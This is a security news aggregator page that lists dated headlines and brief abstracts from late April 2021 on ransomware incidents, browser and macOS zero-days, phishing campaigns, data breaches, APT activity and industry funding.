The internet behemoth rolled out the Chrome 90 stable channel release to address this and eight other security vulnerabilities.Threatpost
April 28, 2021 – General
Hillicon Valley: Parler app risks charges of selling out with Apple return | Justices hear First Amendment clash over cheerleader’s Snapchat | Google pressed to conduct racial equity audit Full Text
Abstract
Parler said it will be back in the Apple App Store this week with approved changes, but those updates may come with the risk of losing the platform’s base users over accusations of selling out to Big Tech and losing its pro-free speech model. Speaking of free speech, a high schooler’s Snapchat about failing to make the varsity cheerleading team is at the center of a crucial First Amendment Supreme Court case. And pressure is mounting for Google to take action in line with its public statements on race, with a civil rights organization calling on the company to conduct a racial equity audit.The Hill
April 28, 2021 – Solution
Can the Bytecode Alliance secure the supply chain with WebAssembly? Full Text
Abstract
The Bytecode Alliance, which counts Intel, Mozilla, Microsoft, and Fastly among its members, announced that it formed a non-profit organization to focus on promoting WebAssembly (WASM) and the WebAssembly System Interface (WASI) as emerging standards that can fix some of the inherent weaknesses in the way software gets developed.SCMagazine
April 28, 2021 – Privacy
Lawmakers introduce legislation to create civilian reserve program to fight hackers Full Text
Abstract
A group of bipartisan lawmakers in the House and Senate on Wednesday rolled out legislation that would create a National Guard-style program to help defend critical systems against increasing cyberattacks from nation states and criminals.The Hill
April 28, 2021 – Phishing
Scammers imitate Windows logo with HTML tables to slip through email gateways Full Text
Abstract
Email security solutions featuring machine learning or computer vision should be able to identify the fake logo and sniff out the attack.SCMagazine
April 28, 2021 – Phishing
Click Studios says stop tweeting: Phishers track breach notification info to craft new lures Full Text
Abstract
Companies are often pilloried in the wake of data breaches for lacking transparency or leaving their users in the dark about potential impact. This incident demonstrates the flip side of that coin, how information or communications from a company following a breach can be weaponized by bad actors.SCMagazine
April 28, 2021 – Breach
DigitalOcean data breach exposes customer billing information Full Text
Abstract
Cloud hosting provider DigitalOcean has disclosed a data breach after a flaw exposed customers' billing information.BleepingComputer
April 28, 2021 – APT
Naikon APT group uses new Nebulae backdoor in attacks aimed at military orgs Full Text
Abstract
China-linked APT Naikon employed a new backdoor in multiple cyber-espionage operations targeting military organizations from Southeast Asia in the last 2 years. The Naikon APT group is a China-linked cyber espionage group that has been active...Security Affairs
April 28, 2021 – Vulnerabilities
Microsoft Office SharePoint Targeted With High-Risk Phish, Ransomware Attacks Full Text
Abstract
SharePoint servers are being picked at with high-risk, legitimate-looking, branded phish messages and preyed on by a ransomware gang using an old bug.Threatpost
April 28, 2021 – Attack
Fourth time’s a charm - OGUsers hacking forum hacked again Full Text
Abstract
Popular hacking forum OGUsers has been hacked for its fourth time in two years, with hackers now selling the site's database containing user records and private messages.BleepingComputer
April 28, 2021 – Policy and Law
DOJ building the guardrails for Microsoft Exchange-type malware takedowns Full Text
Abstract
Demers said the department would evaluate the Exchange operation to try to generalize future standards, and that such infiltration of private systems would not be a “tool of first resort.”SCMagazine
April 28, 2021 – Malware
Malware Increasingly Using TLS to Hide Communication Full Text
Abstract
Malware actors have doubled the number of attacks leveraging TLS communications, helping them stay hidden from security systems. Only a few are using self-signed certificates.Cyware Alerts - Hacker News
April 28, 2021 – Policy and Law
US Arrests Alleged Crypto Mixer Full Text
Abstract
Man suspected of laundering around $336m in Bitcoin via a crypto-mixing service is arrestedInfosecurity Magazine
April 28, 2021 – Criminals
A Ransomware Gang is Now Shorting Stock Price of its Victims Full Text
Abstract
The Darkside group has advanced its extortion tactics to target companies that are listed on NASDAQ or other stock markets. However, the chances of this technique succeeding are narrow, say experts.Cyware Alerts - Hacker News
April 28, 2021 – Breach
Sensitive source codes exposed in Microsoft Azure Blob account leak Full Text
Abstract
The data included files that appeared to originate from a series of pitches made to Microsoft Dynamics from numerous companies vying for a project or partnership with the company.Hackread
April 28, 2021 – General
Data Breach Impacts 1 in 4 Wyomingites Full Text
Abstract
Wyoming Department of Health exposes test results of more than a quarter of state residents on GitHubInfosecurity Magazine
April 28, 2021 – Ransomware
Ransomware Payment Demands Rose by 43% So Far in 2021 Full Text
Abstract
The average demand for a digital extortion payment shot up in the first quarter of this year to $220,298, up 43% from the previous quarter, according to a quarterly report from Coveware.Cyberscoop
April 28, 2021 – Business
DevSecOps Company Sysdig Raises $188 Million at $1.19 Billion Valuation Full Text
Abstract
The latest funding round, which brings the total raised by the company to $394 million, was led by Premji Invest & Associates and Third Point Ventures, with participation from several other investors.Security Week
April 28, 2021 – Malware
New stealthy Linux malware used to backdoor systems for years Full Text
Abstract
A recently discovered Linux malware with backdoor capabilities has flown under the radar for years, allowing attackers to harvest and exfiltrate sensitive information from compromised devices.BleepingComputer
April 28, 2021 – Phishing
SMS phishing scam lures Rogers customers with outage refunds Full Text
Abstract
Cybercriminals target Rogers customers with a new SMS phishing campaign pretending to be refunds for last week's Canada-wide wireless outage.BleepingComputer
April 28, 2021 – Business
Alsid SAS Acquired by Tenable Full Text
Abstract
Tenable acquires Active Directory security firm and launches new solutionInfosecurity Magazine
April 28, 2021 – Phishing
Passwordstate hackers phish for more victims with updated malware Full Text
Abstract
Click Studios, the software company behind the Passwordstate enterprise password manager, is warning customers of ongoing phishing attacks targeting them with updated Moserpass malware.BleepingComputer
April 28, 2021 – Business
Secrets management and authentication platform Akeyless raises $14M Full Text
Abstract
Akeyless, a SaaS platform for authentication and digital access, has offices in New York and Tel Aviv and says the round will be put toward hiring and global expansion to grow its customer base.Venture Beat
April 28, 2021 – Criminals
Cybercriminals Widely Abusing Excel 4.0 Macro to Distribute Malware Full Text
Abstract
Threat actors are increasingly adopting Excel 4.0 documents as an initial stage vector to distribute malware such as ZLoader and Quakbot, according to new research. The findings come from an analysis of 160,000 Excel 4.0 documents between November 2020 and March 2021, out of which more than 90% were classified as malicious or suspicious. "The biggest risk for the targeted companies and individuals is the fact that security solutions still have a lot of problems with detecting malicious Excel 4.0 documents, making most of these slip by conventional signature based detections and analyst written YARA rules," researchers from ReversingLabs said in a report published today . Excel 4.0 macros (XLM), the precursor to Visual Basic for Applications (VBA), is a legacy feature incorporated in Microsoft Excel for backward compatibility reasons. Microsoft warns in its support document that enabling all macros can cause "potentially dangerous code" to run. The eveThe Hacker News
April 28, 2021 – Government
G7 Nations Sign Declaration to Keep the Internet Safe and Open Full Text
Abstract
The declaration has come amid concerns about the influence of illiberal nations and big tech in cyberspaceInfosecurity Magazine
April 28, 2021 – Vulnerabilities
Google addresses a high severity flaw in V8 engine in Chrome Full Text
Abstract
Google released updates for Chrome 90 that address a new serious issue, tracked as CVE-2021-21227, in the V8 JavaScript engine used by the web browser. Google has released security updates for Chrome 90 that address a new high severity vulnerability,...Security Affairs
April 28, 2021 – General
Cloud security tops among list of skills needed to pursue cyber career Full Text
Abstract
Problem solving and analytical thinking were among the most important soft skills named by cyber professionals.SCMagazine
April 28, 2021 – Phishing
Chase Bank Phish Swims Past Exchange Email Protections Full Text
Abstract
Two phishing attacks elude Exchange security protections and spoof real-life account scenarios in an attempt to fool victims.Threatpost
April 28, 2021 – Government
Cyberspies target military organizations with new Nebulae backdoor Full Text
Abstract
A Chinese-speaking threat actor has deployed a new backdoor in multiple cyber-espionage operations spanning roughly two years and targeting military organizations from Southeast Asia.BleepingComputer
April 28, 2021 – Phishing
Deep Analysis: FormBook New Variant Delivered in Phishing Campaign – Part III Full Text
Abstract
When FormBook starts in a target process, it loads an ntdll.dll module and then overrides its data with the deployed FormBook malware. This disguises FormBook as an ntdll.dll module when it runs.Fortinet
April 28, 2021 – Vulnerabilities
F5 BIG-IP Found Vulnerable to Kerberos KDC Spoofing Vulnerability Full Text
Abstract
Cybersecurity researchers on Wednesday disclosed a new bypass vulnerability in the Kerberos Key Distribution Center (KDC) security feature impacting F5 Big-IP application delivery services. "The KDC Spoofing vulnerability allows an attacker to bypass the Kerberos authentication to Big-IP Access Policy Manager (APM), bypass security policies and gain unfettered access to sensitive workloads," Silverfort researchers Yaron Kassner and Rotem Zach said in a report. "In some cases this can be used to bypass authentication to the Big-IP admin console as well." Coinciding with the public disclosure, F5 has released a patch to address the weakness. Kerberos is an authentication protocol that relies on a client-server model for mutual authentication and requires a trusted intermediary called Key Distribution Center ( KDC ) — a Kerberos Authentication Server (AS) or a Ticket Granting Server in this case — that acts as a repository of shared secret keys of all users as weThe Hacker News
April 28, 2021 – Covid-19
#GartnerIAM: Pandemic Disruption Necessitates a Transformation in Identity Access Management Full Text
Abstract
IAM has to be radically altered in light of distributed workforcesInfosecurity Magazine
April 28, 2021 – Ransomware
UK rail network Merseyrail hit by ransomware gang Full Text
Abstract
UK rail network Merseyrail was hit by a cyberattack, ransomware operators breached the corporate email system to disclose the attack to employees and journalists. UK rail network Merseyrail, which operates rail services across Merseyside, announced...Security Affairs
April 28, 2021 – Ransomware
UK rail network Merseyrail likely hit by Lockbit ransomware Full Text
Abstract
UK rail network Merseyrail has confirmed a cyberattack after a ransomware gang used their email system to email employees and journalists about the attack.BleepingComputer
April 28, 2021 – Vulnerabilities
An Analysis of VB6 P-Code Obfuscation Full Text
Abstract
One of the formats that has not seen common obfuscation has been the Visual Basic 6 P-Code byte streams. This is a proprietary opcode set, in a complex file format, with limited tooling available.Avast
April 28, 2021 – Malware
Attention! FluBot Android Banking Malware Spreads Quickly Across Europe Full Text
Abstract
Attention, Android users! A banking malware capable of stealing sensitive information is "spreading rapidly" across Europe, with the U.S. likely to be the next target. According to a new analysis by Proofpoint , the threat actors behind FluBot (aka Cabassous ) have branched out beyond Spain to target the U.K., Germany, Hungary, Italy, and Poland. The English-language campaign alone has been observed to make use of more than 700 unique domains, infecting about 7,000 devices in the U.K. In addition, German and English-language SMS messages were found being sent to U.S. users from Europe, which Proofpoint suspects could be the result of malware propagating via contact lists stored on compromised phones. A concerted campaign aimed at the U.S. is yet to be detected. FluBot, a nascent entry in the banking trojan landscape, began its operations late last year, with campaigns leveraging the malware infecting more than 60,000 users in Spain, according to an analysis published bThe Hacker News
April 28, 2021 – Breach
Security Spending Doubles but Two-Fifths of Firms Suffer Breaches Full Text
Abstract
Hiscox claims just a fifth of organizations are cyber “experts”Infosecurity Magazine
April 28, 2021 – Vulnerabilities
Cloud misconfiguration, a major risk for cloud security Full Text
Abstract
Misconfigured cloud-based databases continue to cause data breaches, millions of database servers are currently exposed across cloud providers. Fugue’s new State of Cloud Security 2020 report reveals that misconfigured cloud-based databases continue...Security Affairs
April 28, 2021 – Policy and Law
GitHub disables Google FloC user tracking on its website Full Text
Abstract
GitHub has announced rolling out a mysterious HTTP header on all GitHub Pages sites to block Google FLoC tracking.BleepingComputer
April 28, 2021 – Malware
RedLine Stealer Masquerades as Telegram Installer Full Text
Abstract
The .Net based malware has recently been disguised as an installer of the popular secure messaging app, Telegram. Like Most .Net malware, the fake setup file is packed and highly obfuscated.Minerva Labs
April 28, 2021 – Ransomware
Average Ransom Surges 43% After Accellion Attacks Full Text
Abstract
Coveware claims Clop group drove up cybercrime gains in Q1 2021Infosecurity Magazine
April 28, 2021 – Covid-19
COVID-19, WFH prompts spike in cyberattacks against banks, insurers Full Text
Abstract
The coronavirus pandemic and working from home (WFH) requirements are causing a "significant" spike in attacks against financial entities, new research by BAE Systems Applied Intelligence suggests.ZDNet
April 28, 2021 – Covid-19
#COVID19 Rattles Banks and Insurers as Security Budgets Are Slashed Full Text
Abstract
Financial firms and their customers suffer surge in attacks during 2020Infosecurity Magazine
April 28, 2021 – Vulnerabilities
Google Patches Yet Another Serious V8 Vulnerability in Chrome Full Text
Abstract
The vulnerability, tracked as CVE-2021-21227 and rated high severity, was reported to Google by researcher Gengming Liu from the Chinese cybersecurity firm Singular Security Lab.Security Week
April 28, 2021 – Government
Australian government’s major IT shops to help others with cybersecurity Full Text
Abstract
The Australian government is planning on establishing three 'Cyber Hub' pilots that will see departments such as Defence, Home Affairs, and Services Australia provide cyber services for other ones.ZDNet
April 28, 2021 – Ransomware
New WickrMe Ransomware Targets SharePoint Servers to Infiltrate Corporate Networks Full Text
Abstract
SharePoint now joins a list of network devices used as entry points by threat actors that also includes Citrix gateways, F5 BIG-IP load balancers, Microsoft Exchange email servers, and more.The Record
April 27, 2021 – Government
DARPA moves forward in quest for zero-knowledge proofs for vulnerability disclosure Full Text
Abstract
The effort could allow security researchers to publicly prove the existence of a vulnerability without also giving away their underlying research to attackers.SCMagazine
April 27, 2021 – Solution
Microsoft Edge to add automatic HTTPS option for all domains Full Text
Abstract
Microsoft Edge will automatically redirect users to a secure HTTPS connection when visiting websites using the HTTP protocol, starting with version 92, coming in late July.BleepingComputer
April 27, 2021 – APT
An APT Group Exploits VPN to Deploy Supernova on SolarWinds Orion Full Text
Abstract
The U.S. CISA has disclosed details of a new APT that leverages the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a VPN service.Cyware Alerts - Hacker News
April 27, 2021 – General
Hillicon Valley: Acting FTC chair urges Congress to revive agency authority after Supreme Court ruling | Senate Intel panel working on breach notification bill Full Text
Abstract
Acting Federal Trade Commision Chair Rebecca Kelly Slaughter was back on Capitol Hill Tuesday, urging Congressional action to revive the commission’s authority in light of a Supreme Court decision last week. Meanwhile, Senate Intelligence Committee Chairman Mark WarnerMark Robert WarnerDemocrats divided over GOP infrastructure offer Lawmakers react to guilty verdict in Chauvin murder trial: 'Our work is far from done' Manchin throws support behind union-backed PRO Act MORE (D-Va.) announced upcoming legislation from his committee around mandatory data breach notification, and two key senators hinted at renewed action to create federal standards on self-driving cars.The Hill
April 27, 2021 – Hacker
Hackers Threaten to Leak D.C. Police Informants’ Info If Ransom Is Not Paid Full Text
Abstract
The Metropolitan Police Department (MPD) of the District of Columbia has become the latest high-profile government agency to fall victim to a ransomware attack. The Babuk Locker gang claimed in a post on the dark web that they had compromised the DC Police's networks and stolen 250 GB of unencrypted files. Screenshots shared by the group, and seen by The Hacker News, include various folders containing what appears to be investigation reports, arrests, disciplinary actions, and other intelligence briefings. Also called the DC Police, the MPD is the primary law enforcement agency for the District of Columbia in the U.S. The ransomware gang has given the department three days to heed to their ransom demand or risk leaking sensitive files that could expose police informants to criminal gangs. "Hello! Even an institution such as DC can be threatened, we have downloaded a sufficient amount of information from your internal networks, and we advise you to contact us as soon as pThe Hacker News
April 27, 2021 – Policy and Law
Kik Tip Leads to Kindergarten Teacher’s Arrest Full Text
Abstract
Cyber-tip about child sexual abuse material sharing leads to arrest of Indiana teacherInfosecurity Magazine
April 27, 2021 – Government
FBI shares with HIBP 4 million email addresses involved in Emotet attacks Full Text
Abstract
The FBI has shared with Have I Been Pwned service 4 million email addresses collected by Emotet botnet and employed in malware campaigns. Last week, European law enforcement has conducted an operation aimed at performing a mass-sanitization of computers...Security Affairs
April 27, 2021 – Vulnerabilities
Microsoft SharePoint vulnerability and China Chopper web shell used in ransomware attacks Full Text
Abstract
Researchers reported that to ignite a ransomware payload, the attackers abuse a Cobalt Strike beacon. The researchers believe the China Chopper web shell was used in a likely attempt to circumvent detection with known samples.SCMagazine
April 27, 2021 – Ransomware
Babuk Ransomware Gang Targets Washington D.C. Police Full Text
Abstract
The RaaS developers thumbed their noses at police, saying “We find 0 day before you.”Threatpost
April 27, 2021 – Government
FBI shares 4 million email addresses used by Emotet with Have I Been Pwned Full Text
Abstract
Millions of email addresses collected by Emotet botnet for malware distribution campaigns have been shared by the Federal Bureau of Investigation (FBI) as part of the agency's effort to clean infected computers.BleepingComputer
April 27, 2021 – Breach
HashiCorp reveals exposure of private code-signing key after Codecov compromise Full Text
Abstract
HashiCorp, a software company making automated cloud deployment tools, has revealed a private code-signing key was exposed thanks to the compromised Codecov script discovered earlier this month.The Register
April 27, 2021 – Policy and Law
Senate Intelligence panel working on legislation around mandatory cyber breach notification Full Text
Abstract
The Senate Intelligence Committee is working on a bill to create some form of limited data breach mandatory reporting for the private sector, with the goal of preventing future major foreign cyberattacks on critical organizations.The Hill
April 27, 2021 – General
Cybersecurity Webinar: Understanding the 2020 MITRE ATT&CK Results Full Text
Abstract
The release of MITRE Engenuity's Carbanak+Fin7 ATT&CK evaluations every year is a benchmark for the cybersecurity industry. The organization's tests measure how well security vendors can detect and respond to threats and offers an independent metric for customers and security leaders to understand how well vendors perform on a variety of tasks. However, for the uninitiated, the results can be hard to decipher and contextualize properly. Unlike many benchmarks that compare participants in a competitive manner, MITRE's framework evaluates companies exclusively on how they respond to the tests. This means that customers must really know what they're looking for. A new webinar ( register here ) aims to provide some clarity on what to look for and how to interpret the results. Cynet's new live webinar will dig a little deeper into the MITRE ATT&CK evaluation. The company's research team will break down how the evaluations work, what the results mean, anThe Hacker News
April 27, 2021 – Phishing
Threat Actors Impersonate Chase Bank Full Text
Abstract
Cyber-criminals launch credential phishing attacks targeting Chase bank customersInfosecurity Magazine
April 27, 2021 – Government
CISA, NIST published an advisory on supply chain attacks Full Text
Abstract
CISA and NIST published a report on software supply chain attacks that shed light on the associated risks and provide instructions on how to mitigate them. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the National Institute...Security Affairs
April 27, 2021 – Hacker
Another SolarWinds lesson: Hackers are targeting Microsoft authentication servers Full Text
Abstract
Mandiant Tuesday detailed a new attack strategy against Microsoft’s Active Directory Federation Services (AD FS). Researchers believe the need to protect AD FS might be the unheralded second lesson from the SolarWinds campaign.SCMagazine
April 27, 2021 – Breach
MangaDex discloses data breach after stolen database shared online Full Text
Abstract
Manga scanlation site MangaDex disclosed a data breach last week after learning that the site's user database was privately circulating among threat actors.BleepingComputer
April 27, 2021 – Ransomware
Qlocker Ransomware is Targeting QNAP Devices Full Text
Abstract
The Qlocker group was spotted using 7-Zip to move files on QNAP devices into password-protected archives. It generated about $260,000 within a week by remotely encrypting files.Cyware Alerts - Hacker News
April 27, 2021 – Hacker
Hackers Exploit 0-Day Gatekeeper Flaw to Attack MacOS Computers Full Text
Abstract
Security is only as strong as the weakest link. As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs. The macOS flaw, identified as CVE-2021-30657 , was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021. "An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system," security researcher Patrick Wardle explained in a write-up. "Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users." Apple's macOS comes with a feature called Gatekeeper , which allows only trusteThe Hacker News
April 27, 2021 – Breach
Online Music Marketplace Suffers Data Breach Full Text
Abstract
Cybersecurity researcher finds millions of Reverb.com records on unprotected serverInfosecurity Magazine
April 27, 2021 – Ransomware
Ransomware hit Guilderland Central School District near Albany Full Text
Abstract
Officials revealed that the school district near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday. The Guilderland Central School District near Albany was hit by a ransomware attack...Security Affairs
April 27, 2021 – Business
Cigent gets $7.6 million to reimagine data protection at the file level Full Text
Abstract
The cybersecurity startup is being backed by In-Q-Tel and other investors to bring their data defense technologies to the commercial market.SCMagazine
April 27, 2021 – Phishing
Phishing attacks target Chase Bank customers Full Text
Abstract
In a new report released Tuesday, security firm Armorblox revealed two recent phishing campaigns aimed at Chase Bank customers with an objective to steal their account credentials.Tech Republic
April 27, 2021 – General
Parents Should Take Action to Protect Children from Cyber-Risks Full Text
Abstract
What are the cyber-risks facing children, and how can these be tackled by parents?Infosecurity Magazine
April 27, 2021 – Malware
WhatsApp Pink Malware Can Auto-Reply to Multiple Messaging Apps Full Text
Abstract
A new version of WhatsApp is making rounds. It claims to give you an enhanced version of WhatsApp with additional features but the truth is that this WhatsApp clone app is malicious.Cyware Alerts - Hacker News
April 27, 2021 – Hacker
REvil Removes Apple Extortion Attempt from Site: Report Full Text
Abstract
Mystery as ransomware group deletes all mention of schemeInfosecurity Magazine
April 27, 2021 – Vulnerabilities
Apple iOS 14.5 Patches 50 Security Vulnerabilities Full Text
Abstract
Apple on Monday shipped the long-awaited iOS and iPadOS 14.5 update with patches for at least 50 documented security vulnerabilities including a WebKit flaw exploited in the wild.Security Week
April 27, 2021 – Business
Private Equity Giant Snaps Up Proofpoint for $12.3 billion Full Text
Abstract
Thoma Bravo will add the SaaS player to its large security portfolioInfosecurity Magazine
April 27, 2021 – Government
FBI Shares Email Addresses to Speed Emotet Cleanup Full Text
Abstract
The FBI has shared 4.3 million email addresses stolen by the Emotet malware with the Have I Been Pwned breach notification site in another effort to remediate the effects of the devastating botnet.Info Risk Today
April 27, 2021 – Hacker
Ransomware Group Threatens DC Cops with Informant Data Leak Full Text
Abstract
Babuk is reportedly ready to share info with local gangsInfosecurity Magazine
April 27, 2021 – Attack
Ransomware Attack Forces Students Into Remote Learning at Guilderland Central School District Full Text
Abstract
The Guilderland Central School District near Albany was hit by a ransomware attack that forced students in grades 7 through 12 into all-remote learning on Monday, as confirmed by district officials.Security Affairs
April 27, 2021 – Business
Endpoint Management Firm Automox Raises $110 Million Full Text
Abstract
Cyber hygiene and patch management company Automox on Tuesday announced raising $110 million in a Series C funding round that brings the total raised by the firm to more than $152 million.Security Week
April 27, 2021 – Malware
New ICS Threat Activity Group: TALONITE Full Text
Abstract
TALONITE gains initial network access via spearphishing that leverages malicious documents and executables focused on engineering-specific themes and concepts to distribute FlowCloud and LookBack.Dragos
April 27, 2021 – Malware
Dridex Malware Returns In a New Global QuickBooks Malspam Campaign Full Text
Abstract
Phishing attacks masquerading as QuickBooks invoices are targeting users of the popular accounting software in an attempt to infect victim’s devices with the infamous Dridex banking Trojan.Bitdefender
April 27, 2021 – Government
FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities. By employing "stealthy intrusion tradecraft within compromised networks," the intelligence agencies said , "the SVR activity—which includes the recent SolarWinds Orion supply chain compromise —primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information." The cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and formally pinnThe Hacker News
April 27, 2021 – Policy and Law
Australian man sentenced for running stolen subscription credential service Full Text
Abstract
An investigation into stolen subscription service credentials by the Australian Federal Police (AFP) has resulted in a two years and two months' sentence for a man from Sydney.ZDNet
April 27, 2021 – Malware
Microsoft Defender uses Intel TDT technology against crypto-mining malware Full Text
Abstract
Microsoft announced an improvement of its Defender antivirus that will leverage Intel's Threat Detection Technology (TDT) to detect processes associated with crypto-miners. Microsoft announced that Microsoft Defender for Endpoint, its commercial version...Security Affairs
April 27, 2021 – Business
Network security company Proofpoint goes private in $12.3B deal Full Text
Abstract
Private equity firm Thoma Bravo has announced plans to acquire cybersecurity company Proofpoint, which was founded in 2002 and went public in 2012, in a deal worth $12.3 billion.Venture Beat
April 27, 2021 – Malware
Shlayer macOS malware abuses zero-day to bypass Gatekeeper feature Full Text
Abstract
Apple addresses a zero-day in macOS exploited by Shlayer malware to bypass Apple's security features and deliver second-stage malicious payloads. Apple has addressed a zero-day flaw in macOS that was exploited by Shlayer malware to bypass Apple's...Security Affairs
April 26, 2021 – General
Water utility CISO offers tips to stay secure as IT and OT converge Full Text
Abstract
Kristin Sanders, chief information security officer for the Albuquerque Bernalillo County Water Utility Authority, revealed how New Mexico’s largest water and wastewater utility has been addressing the security challenge by leveraging a series of software solutions, sensors and internet-of-things technology.SCMagazine
April 26, 2021 – General
Water utility CISO offers tips to stay secure as IT and OT converges Full Text
Abstract
Kristin Sanders, chief information security officer for the Albuquerque Bernalillo County Water Utility Authority, revealed how New Mexico’s largest water and wastewater utility has been addressing the security challenge by leveraging a series of software solutions, sensors and internet-of-things technology.SCMagazine
April 26, 2021 – Ransomware
DC Police confirms cyberattack after ransomware gang leaks data Full Text
Abstract
The Metropolitan Police Department has confirmed that they suffered a cyberattack after the Babuk ransomware gang leaked screenshots of stolen data.BleepingComputer
April 26, 2021 – General
Hillicon Valley: New cyber budget request | Apple rolls out anticipated privacy update | And gets a new antitrust challenge Full Text
Abstract
Happy Monday! A bipartisan group of representatives think a key cybersecurity agency is in need of more funding after responses to SolarWinds and new Microsoft vulnerabilities. Also, Apple rolled out its long awaited privacy feature, which has already received significant criticism from Facebook.The Hill
April 26, 2021 – Breach
Reverb discloses data breach exposing musicians’ personal info Full Text
Abstract
Popular musical instrument marketplace Reverb has suffered a data breach after an unsecured database containing customer information was exposed online.BleepingComputer
April 26, 2021 – Vulnerabilities
Boffins found a bug in Apple AirDrop that could leak users’ personal info Full Text
Abstract
Experts found a bug in Apple's wireless file-sharing protocol Apple AirDrop that could expose user's contact information. Boffins from the Technical University of Darmstadt, Germany, have discovered a privacy issue in Apple's wireless file-sharing...Security Affairs
April 26, 2021 – Privacy
Flubot Spyware Spreading Through Android Devices Full Text
Abstract
The malware is spreading rapidly through ‘missed package delivery’ SMS texts, prompting urgent scam warnings from mobile carriers.Threatpost
April 26, 2021 – Government
Lawmakers call for increasing the budget of key federal cybersecurity agency Full Text
Abstract
A pair of House lawmakers are urging legislators to appropriate more funding for a key federal cybersecurity agency after a year in which cyber threats skyrocketed.The Hill
April 26, 2021 – General
22% of all users still run Microsoft end-of-life Windows 7 Full Text
Abstract
Microsoft stopped supporting Windows 7 in January 2020, meaning users don’t get software updates and are more susceptible to attacks.SCMagazine
April 26, 2021 – Ransomware
Ransomware gang now warns they will leak new Apple logos, iPad plans Full Text
Abstract
The REvil ransomware gang has mysteriously removed Apple's schematics from their data leak site after privately warning Quanta that they would leak drawings for the new iPad and new Apple logos.BleepingComputer
April 26, 2021 – Breach
Accellion data breaches drive up average ransom price Full Text
Abstract
The data breaches caused by the Clop ransomware gang exploiting a zero-day vulnerability have led to a sharp increase in the average ransom payment calculated for the first three months of the year.BleepingComputer
April 26, 2021 – Vulnerabilities
Apple fixes macOS zero-day bug exploited by Shlayer malware Full Text
Abstract
Apple has fixed a zero-day vulnerability in macOS exploited in the wild by Shlayer malware to bypass Apple's File Quarantine, Gatekeeper, and Notarization security checks and download second-stage malicious payloads.BleepingComputer
April 26, 2021 – Botnet
When Should U.S. Cyber Command Take Down Criminal Botnets? Full Text
Abstract
The Trickbot takedown and such military operations are a good idea only in cases that meet a five-part test of imminence, severity, overseas focus, nation-state adversary, and military as a last-ish resort.Lawfare
April 26, 2021 – Business
With $30M extension, BigID boosts Series D to $100M at $1.25B valuation Full Text
Abstract
After announcing a $70 million Series D at a $1 billion valuation at the end of 2020, now BigID announced a $30 million extension from Advent International valuing the company at $1.25 billion.TechCrunch
April 26, 2021 – Vulnerabilities
Nvidia Warns: Severe Security Bugs in GPU Driver, vGPU Software Full Text
Abstract
The gaming- and AI-friendly graphics accelerators can open the door to a range of cyberattacks.Threatpost
April 26, 2021 – Government
State-Sponsored Adversaries Increasingly Targeting the U.S. Full Text
Abstract
The intelligence community is warning about the rise in U.S. adversaries that are using cyberspace to attack the country. It named China, Iran, North Korea among the top threats.Cyware Alerts - Hacker News
April 26, 2021 – IOT
IoT Devices Under Constant Cyber Threat Full Text
Abstract
A series of recent attacks on IoT devices implies bigger security risks that hover over them. It is even more concerning for consumers as they are unaware of threats and do not own the resources to mitigate them.Cyware Alerts - Hacker News
April 26, 2021 – Business
AirEye Raises $8M Series A to Extend Network Security into the Unprotected Digital Airspace Full Text
Abstract
AirEye, an Network Airspace Protection (NAP) provider, announced raising $8 million in its Series A funding round led by U.S. Venture Partners (USVP), with Canaan Partners also taking part.Yahoo! Finance
April 26, 2021 – Policy and Law
Nintendo Sues Bowser Full Text
Abstract
Gaming giant files lawsuit against alleged leader of video game piracy groupInfosecurity Magazine
April 26, 2021 – Vulnerabilities
Apple patches ‘worst macOS bug in recent memory’ after it was used in the wild Full Text
Abstract
The bug, patched in macOS 11.3, allowed hackers to circumvent much of Apple’s built-in malware detection for programs downloaded from the internet.SCMagazine
April 26, 2021 – Malware
Microsoft Defender now blocks cryptojacking malware using Intel TDT Full Text
Abstract
Microsoft today announced that Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus, now comes with support for blocking cryptojacking malware using Intel's silicon-based Threat Detection Technology (TDT).BleepingComputer
April 26, 2021 – Ransomware
The Mysterious Tale of a Ransomware Cartel Full Text
Abstract
Analysis suggests that four different ransomware groups formed a cartel to leak stolen data via their partners. What surprised the researchers most is the missing element of profit-sharing.Cyware Alerts - Hacker News
April 26, 2021 – Attack
Cyber-attack on NBA Team Full Text
Abstract
Investigation launched into cyber-attack on Houston RocketsInfosecurity Magazine
April 26, 2021 – Breach
Threat Actor Leaks 263GB Data Containing Sensitive Household Records of 250 Million Americans on Hacker Forum Full Text
Abstract
As seen by Hackread.com, the database was leaked on a prominent hacker forum and comprises 263 GB worth of records including 1,255 CSV subfiles each with 200,000 listings.Hackread
April 26, 2021 – Government
Space Command to Launch Dedicated Cyber Center Full Text
Abstract
Joint cyber center planned to help Cyber Command and Space Command integrateInfosecurity Magazine
April 26, 2021 – General
In the Wake of SolarWinds, the U.S. Must Grapple With the Future and Not Just the Past Full Text
Abstract
Given the wide range of strategic and tactical benefits for Russia, a cyber operation with SolarWinds’ scale and sophistication should never be understood as “just espionage.”Lawfare
April 26, 2021 – Government
US warns of Russian state hackers still targeting US, foreign orgs Full Text
Abstract
The FBI, the US Department of Homeland Security (DHS), and the Cybersecurity and Infrastructure Security Agency (CISA) warned today of continued attacks coordinated by the Russian-backed APT 29 hacking group against US and foreign organizations.BleepingComputer
April 26, 2021 – Ransomware
61% of organizations impacted by ransomware in 2020 Full Text
Abstract
